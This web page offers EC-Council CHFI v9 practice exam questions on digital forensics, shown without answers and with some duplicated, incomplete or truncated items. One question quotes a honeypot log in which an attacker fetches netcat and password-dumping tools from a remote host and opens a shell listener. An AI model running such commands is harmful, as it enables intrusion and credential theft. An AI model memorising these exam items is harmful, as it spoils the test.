Independence Day Special Discount Limited Time 65% Offer - Ends in 0d 00h 00m 00s - Coupon code: netdisc

ECCouncil 312-49v9 ECCouncil Computer Hacking Forensic Investigator (V9) Exam Practice Test

Page: 1 / 59
Total 589 questions

ECCouncil Computer Hacking Forensic Investigator (V9) Questions and Answers

Question 1

Which network attack is described by the following statement? "At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries."

Options:

A.

Man-in-the-Middle Attack

B.

Sniffer Attack

C.

Buffer Overflow

D.

DDoS

Question 2

Which program is the bootloader when Windows XP starts up?

Options:

A.

KERNEL.EXE

B.

NTLDR

C.

LOADER

D.

LILO

Question 3

During an investigation, an employee was found to have deleted harassing emails that were sent to someone else. The company was using Microsoft Exchange and had message tracking enabled. Where could the investigator search to find the message tracking log file on the Exchange server?

Options:

A.

C:\Program Files\Exchsrvr\servername.log

B.

D:\Exchsrvr\Message Tracking\servername.log

C.

C:\Exchsrvr\Message Tracking\servername.log

D.

C:\Program Files\Microsoft Exchange\srvr\servername.log

Question 4

Which tool does the investigator use to extract artifacts left by Google Drive on the system?

Options:

A.

PEBrowse Professional

B.

RegScanner

C.

RAM Capturer

D.

Dependency Walker

Question 5

Which password cracking technique uses details such as length of password, character sets used to construct the password, etc.?

Options:

A.

Dictionary attack

B.

Brute force attack

C.

Rule-based attack

D.

Man in the middle attack

Question 6

All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?

Options:

A.

Blackberry Message Center

B.

Microsoft Exchange

C.

Blackberry WAP gateway

D.

Blackberry WEP gateway

Question 7

Which of the following commands shows you the names of all open shared files on a server and the number of file locks on each file?

Options:

A.

Net config

B.

Net file

C.

Net share

D.

Net sessions

Question 8

Netstat is a tool for collecting information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

Options:

A.

netstat – r

B.

netstat – ano

C.

netstat – b

D.

netstat – s

Question 9

Which network attack is described by the following statement?

“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.”

Options:

A.

DDoS

B.

Sniffer Attack

C.

Buffer Overflow

D.

Man-in-the-Middle Attack

Question 10

What method of copying should always be performed first before carrying out an investigation?

Options:

A.

Parity-bit copy

B.

Bit-stream copy

C.

MS-DOS disc copy

D.

System level copy

Question 11

Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?

Options:

A.

Phreaking

B.

Squatting

C.

Crunching

D.

Pretexting

Question 12

When using an iPod and the host computer is running Windows, what file system will be used?

Options:

A.

iPod+

B.

HFS

C.

FAT16

D.

FAT32

Question 13

When investigating a wireless attack, what information can be obtained from the DHCP logs?

Options:

A.

The operating system of the attacker and victim computers

B.

IP traffic between the attacker and the victim

C.

MAC address of the attacker

D.

If any computers on the network are running in promiscuous mode

Question 14

Which of the following tool creates a bit-by-bit image of an evidence media?

Options:

A.

Recuva

B.

FileMerlin

C.

AccessData FTK Imager

D.

Xplico

Question 15

Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?

Options:

A.

Typography

B.

Steganalysis

C.

Picture encoding

D.

Steganography

Question 16

What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?

Options:

A.

Copyright

B.

Design patent

C.

Trademark

D.

Utility patent

Question 17

Bob has encountered a system crash and has lost vital data stored on the hard drive of his Windows computer. He has no cloud storage or backup hard drives. he wants to recover all those data, which includes his personal photos, music, documents, videos, official email, etc. Which of the following tools shall resolve Bob’s purpose?

Options:

A.

Colasoft’s Capsa

B.

Recuva

C.

Cain & Abel

D.

Xplico

Question 18

What encryption technology is used on Blackberry devices Password Keeper?

Options:

A.

3DES

B.

AES

C.

Blowfish

D.

RC5

Question 19

Linux operating system has two types of typical bootloaders namely LILO (Linux Loader) and GRUB (Grand Unified Bootloader). In which stage of the booting process do the bootloaders become active?

Options:

A.

Bootloader Stage

B.

Kernel Stage

C.

BootROM Stage

D.

BIOS Stage

Question 20

A forensics investigator is searching the hard drive of a computer for files that were recently moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find anything. What is the reason for this?

Options:

A.

He should search in C:\Windows\System32\RECYCLED folder

B.

The Recycle Bin does not exist on the hard drive

C.

The files are hidden and he must use switch to view them

D.

Only FAT system contains RECYCLED folder and not NTFS

Question 21

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

Options:

A.

Searching for evidence themselves would not have any ill effects

B.

Searching could possibly crash the machine or device

C.

Searching creates cache files, which would hinder the investigation

D.

Searching can change date/time stamps

Question 22

Which MySQL log file contains information on server start and stop?

Options:

A.

Slow query log file

B.

General query log file

C.

Binary log

D.

Error log file

Question 23

Amber, a black hat hacker, has embedded a malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?

Options:

A.

Click-jacking

B.

Compromising a legitimate site

C.

Spearphishing

D.

Malvertising

Question 24

When needing to search for a website that is no longer present on the Internet today but was online few years back, what site can be used to view the website collection of pages?

Options:

A.

Proxify.net

B.

Dnsstuff.com

C.

Samspade.org

D.

Archive.org

Question 25

Who is responsible for the following tasks?

Options:

A.

Non-forensics staff

B.

Lawyers

C.

System administrators

D.

Local managers or other non-forensic staff

Question 26

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away.

Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?

Options:

A.

Computers on his wired network

B.

Satellite television

C.

2.4Ghz Cordless phones

D.

CB radio

Question 27

Bob works as information security analyst for a big finance company. One day, the anomaly-based intrusion detection system alerted that a volumetric DDOS targeting the main IP of the main web server was occurring. What kind of attack is it?

Options:

A.

IDS attack

B.

APT

C.

Web application attack

D.

Network attack

Question 28

Where is the startup configuration located on a router?

Options:

A.

Static RAM

B.

BootROM

C.

NVRAM

D.

Dynamic RAM

Question 29

What type of analysis helps to identify the time and sequence of events in an investigation?

Options:

A.

Time-based

B.

Functional

C.

Relational

D.

Temporal

Question 30

Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?

Options:

A.

Block all internal MAC address from using SNMP

B.

Block access to UDP port 171

C.

Block access to TCP port 171

D.

Change the default community string names

Question 31

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

Options:

A.

Speculation or opinion as to the cause of the incident

B.

Purpose of the report

C.

Author of the report

D.

Incident summary

Question 32

While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?

Options:

A.

Start and end points for log sequence numbers are specified

B.

Start and end points for log files are not specified

C.

Start and end points for log files are specified

D.

Start and end points for log sequence numbers are not specified

Question 33

What malware analysis operation can the investigator perform using the jv16 tool?

Options:

A.

Files and Folder Monitor

B.

Installation Monitor

C.

Network Traffic Monitoring/Analysis

D.

Registry Analysis/Monitoring

Question 34

Which of the following Windows-based tool displays who is logged onto a computer, either locally or remotely?

Options:

A.

Tokenmon

B.

PSLoggedon

C.

TCPView

D.

Process Monitor

Question 35

You are a Penetration Tester and are assigned to scan a server. You need to use a scanning technique wherein the TCP Header is split into many packets so that it becomes difficult to detect what the packets are meant for. Which of the below scanning technique will you use?

Options:

A.

Inverse TCP flag scanning

B.

ACK flag scanning

C.

TCP Scanning

D.

IP Fragment Scanning

Question 36

Which of the following is NOT an anti-forensics technique?

Options:

A.

Data Deduplication

B.

Steganography

C.

Encryption

D.

Password Protection

Question 37

Which of the following is NOT an anti-forensics technique?

Options:

A.

Data Deduplication

B.

Password Protection

C.

Encryption

D.

Steganography

Question 38

What is the framework used for application development for iOS-based mobile devices?

Options:

A.

Cocoa Touch

B.

Dalvik

C.

Zygote

D.

AirPlay

Question 39

Which of the following is a responsibility of the first responder?

Options:

A.

Determine the severity of the incident

B.

Collect as much information about the incident as possible

C.

Share the collected information to determine the root cause

D.

Document the findings

Question 40

Which of the following protocols allows non-ASCII files, such as video, graphics, and audio, to be sent through the email messages?

Options:

A.

MIME

B.

BINHEX

C.

UT-16

D.

UUCODE

Question 41

Shane, a forensic specialist, is investigating an ongoing attack on a MySQL database server hosted on a Windows machine with SID “WIN-ABCDE12345F.” Which of the following log file will help Shane in tracking all the client connections and activities performed on the database server?

Options:

A.

WIN-ABCDE12345F.err

B.

WIN-ABCDE12345F-bin.n

C.

WIN-ABCDE12345F.pid

D.

WIN-ABCDE12345F.log

Question 42

Which tool allows dumping the contents of process memory without stopping the process?

Options:

A.

psdump.exe

B.

pmdump.exe

C.

processdump.exe

D.

pdump.exe

Question 43

Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?

Options:

A.

Encrypt the backup tapes and use a courier to transport them.

B.

Encrypt the backup tapes and transport them in a lock box

C.

Degauss the backup tapes and transport them in a lock box.

D.

Hash the backup tapes and transport them in a lock box.

Question 44

What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?

Options:

A.

Jump instruction and the OEM ID

B.

BIOS Parameter Block (BPB) and the OEM ID

C.

BIOS Parameter Block (BPB) and the extended BPB

D.

Bootstrap code and the end of the sector marker

Question 45

An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?

Options:

A.

Cloud as a subject

B.

Cloud as a tool

C.

Cloud as an object

D.

Cloud as a service

Question 46

In a Linux-based system, what does the command “Last -F” display?

Options:

A.

Login and logout times and dates of the system

B.

Last run processes

C.

Last functions performed

D.

Recently opened files

Question 47

Which list contains the most recent actions performed by a Windows User?

Options:

A.

MRU

B.

Activity

C.

Recents

D.

Windows Error Log

Question 48

In Linux OS, different log files hold different information, which help the investigators to analyze various issues during a security incident. What information can the investigators obtain from the log file

var/log/dmesg?

Options:

A.

Kernel ring buffer information

B.

All mail server message logs

C.

Global system messages

D.

Debugging log messages

Question 49

What is an investigator looking for in the rp.log file stored in a system running on Windows 10 operating system?

Options:

A.

Restore point interval

B.

Automatically created restore points

C.

System CheckPoints required for restoring

D.

Restore point functions

Question 50

Which command can provide the investigators with details of all the loaded modules on a Linux-based system?

Options:

A.

list modules -a

B.

lsmod

C.

plist mod -a

D.

lsof -m

Question 51

CAN-SPAM act requires that you:

Options:

A.

Don’t use deceptive subject lines

B.

Don’t tell the recipients where you are located

C.

Don’t identify the message as an ad

D.

Don’t use true header information

Question 52

Which principle states that “anyone or anything, entering a crime scene takes something of the scene with them, and leaves something of themselves behind when they leave”?

Options:

A.

Locard's Exchange Principle

B.

Enterprise Theory of Investigation

C.

Locard's Evidence Principle

D.

Evidence Theory of Investigation

Question 53

Which of the following tools is not a data acquisition hardware tool?

Options:

A.

UltraKit

B.

Atola Insight Forensic

C.

F-Response Imager

D.

Triage-Responder

Question 54

Which Event Correlation approach assumes and predicts what an attacker can do next after the attack by studying statistics and probability?

Options:

A.

Profile/Fingerprint-Based Approach

B.

Bayesian Correlation

C.

Time (Clock Time) or Role-Based Approach

D.

Automated Field Correlation

Question 55

Graphics Interchange Format (GIF) is a ____ RGB bitmap image format for images with up to 256 distinct colors per frame.

Options:

A.

8-bit

B.

32-bit

C.

16-bit

D.

24-bit

Question 56

Ron, a computer forensics expert, is investigating a case involving corporate espionage. He has recovered several mobile computing devices from the crime scene. One of the evidence that Ron possesses is a mobile phone from Nokia that was left in ON condition. Ron needs to recover the IMEI number of the device to establish the identity of the device owner. Which of the following key combinations can he use to recover the IMEI number?

Options:

A.

#*06*#

B.

*#06#

C.

#06#*

D.

*IMEI#

Question 57

Which of the following techniques delete the files permanently?

Options:

A.

Steganography

B.

Artifact Wiping

C.

Data Hiding

D.

Trail obfuscation

Question 58

What is the investigator trying to analyze if the system gives the following image as output?

Options:

A.

All the logon sessions

B.

Currently active logon sessions

C.

Inactive logon sessions

D.

Details of users who can logon

Question 59

What do you call the process in which an attacker uses magnetic field over the digital media device to delete any previously stored data?

Options:

A.

Disk deletion

B.

Disk cleaning

C.

Disk degaussing

D.

Disk magnetization

Question 60

Smith is an IT technician that has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from

Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network

vulnerability assessment plan?

Options:

A.

Their first step is to make a hypothesis of what their final findings will be.

B.

Their first step is to create an initial Executive report to show the management team.

C.

Their first step is to analyze the data they have currently gathered from the company or interviews.

D.

Their first step is the acquisition of required documents, reviewing of security policies and compliance.

Question 61

Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops?

Options:

A.

EFS Encryption

B.

DFS Encryption

C.

IPS Encryption

D.

SDW Encryption

Question 62

An Expert witness give an opinion if:

Options:

A.

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

B.

To define the issues of the case for determination by the finder of fact

C.

To stimulate discussion between the consulting expert and the expert witness

D.

To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Question 63

What is the following command trying to accomplish?

Options:

A.

Verify that UDP port 445 is open for the 192.168.0.0 network

B.

Verify that TCP port 445 is open for the 192.168.0.0 network

C.

Verify that NETBIOS is running for the 192.168.0.0 network

D.

Verify that UDP port 445 is closed for the 192.168.0.0 network

Question 64

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.

Options:

A.

Routing Table

B.

Firewall log

C.

Configuration files

D.

Email Header

Question 65

When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.

Options:

A.

A Capital X

B.

A Blank Space

C.

The Underscore Symbol

D.

The lowercase Greek Letter Sigma (s)

Question 66

What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?

Options:

A.

A compressed file

B.

A Data stream file

C.

An encrypted file

D.

A reserved file

Question 67

Which part of the Windows Registry contains the user's password file?

Options:

A.

HKEY_LOCAL_MACHINE

B.

HKEY_CURRENT_CONFIGURATION

C.

HKEY_USER

D.

HKEY_CURRENT_USER

Question 68

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

Options:

A.

Use a system that has a dynamic addressing on the network

B.

Use a system that is not directly interacting with the router

C.

Use it on a system in an external DMZ in front of the firewall

D.

It doesn't matter as all replies are faked

Question 69

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

Options:

A.

The registry

B.

The swap file

C.

The recycle bin

D.

The metadata

Question 70

When investigating a Windows System, it is important to view the contents of the page or swap file because:

Options:

A.

Windows stores all of the systems configuration information in this file

B.

This is file that windows use to communicate directly with Registry

C.

A Large volume of data can exist within the swap file of which the computer user has no knowledge

D.

This is the file that windows use to store the history of the last 100 commands that were run from the command line

Question 71

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

Options:

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Question 72

Software firewalls work at which layer of the OSI model?

Options:

A.

Application

B.

Network

C.

Transport

D.

Data Link

Question 73

When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

Options:

A.

Automate Collection from image files

B.

Avoiding copying data from the boot partition

C.

Acquire data from host-protected area on a disk

D.

Prevent Contamination to the evidence drive

Question 74

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.

What filter should George use in Ethereal?

Options:

A.

src port 23 and dst port 23

B.

udp port 22 and host 172.16.28.1/24

C.

net port 22

D.

src port 22 and dst port 22

Question 75

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

Options:

A.

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

B.

make an MD5 hash of the evidence and compare it to the standard database developed by NIST

C.

there is no reason to worry about this possible claim because state labs are certified

D.

sign a statement attesting that the evidence is the same as it was when it entered the lab

Question 76

The offset in a hexadecimal code is:

Options:

A.

The last byte after the colon

B.

The 0x at the beginning of the code

C.

The 0x at the end of the code

D.

The first byte after the colon

Question 77

Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately.

Which organization coordinates computer crimes investigations throughout the United States?

Options:

A.

Internet Fraud Complaint Center

B.

Local or national office of the U.S. Secret Service

C.

National Infrastructure Protection Center

D.

CERT Coordination Center

Question 78

After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

Options:

A.

Only IBM AS/400 will reply to this scan

B.

Only Windows systems will reply to this scan

C.

A switched network will not respond to packets sent to the broadcast address

D.

Only Unix and Unix-like systems will reply to this scan

Question 79

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

Options:

A.

EFS uses a 128-bit key that can't be cracked, so you will not be able to recover the information

B.

When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.

C.

The EFS Revoked Key Agent can be used on the Computer to recover the information

D.

When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.

Question 80

While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?

Options:

A.

Keep the information of file for later review

B.

Destroy the evidence

C.

Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge

D.

Present the evidence to the defense attorney

Question 81

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

Options:

A.

evidence must be handled in the same way regardless of the type of case

B.

evidence procedures are not important unless you work for a law enforcement agency

C.

evidence in a criminal case must be secured more tightly than in a civil case

D.

evidence in a civil case must be secured more tightly than in a criminal case

Question 82

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

Options:

A.

The manufacturer of the system compromised

B.

The logic, formatting and elegance of the code used in the attack

C.

The nature of the attack

D.

The vulnerability exploited in the incident

Question 83

What does the superblock in Linux define?

Options:

A.

filesynames

B.

diskgeometr

C.

location of the firstinode

D.

available space

Question 84

Which of the following should a computer forensics lab used for investigations have?

Options:

A.

isolation

B.

restricted access

C.

open access

D.

an entry log

Question 85

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

Options:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Question 86

Study the log given below and answer the following question:

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169

Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482

Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53

Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21

Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53

Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111

Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80

Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)

Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)

Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080

Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?

Options:

A.

Disallow UDP53 in from outside to DNS server

B.

Allow UDP53 in from DNS server to outside

C.

Disallow TCP53 in from secondaries or ISP server to DNS server

D.

Block all UDP traffic

Question 87

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

Options:

A.

Use VMware to be able to capture the data in memory and examine it

B.

Give the Operating System a minimal amount of memory, forcing it to use a swap file

C.

Create a Separate partition of several hundred megabytes and place the swap file there

D.

Use intrusion forensic techniques to study memory resident infections

Question 88

When cataloging digital evidence, the primary goal is to

Options:

A.

Make bit-stream images of all hard drives

B.

Preserve evidence integrity

C.

Not remove the evidence from the scene

D.

Not allow the computer to be turned off

Page: 1 / 59
Total 589 questions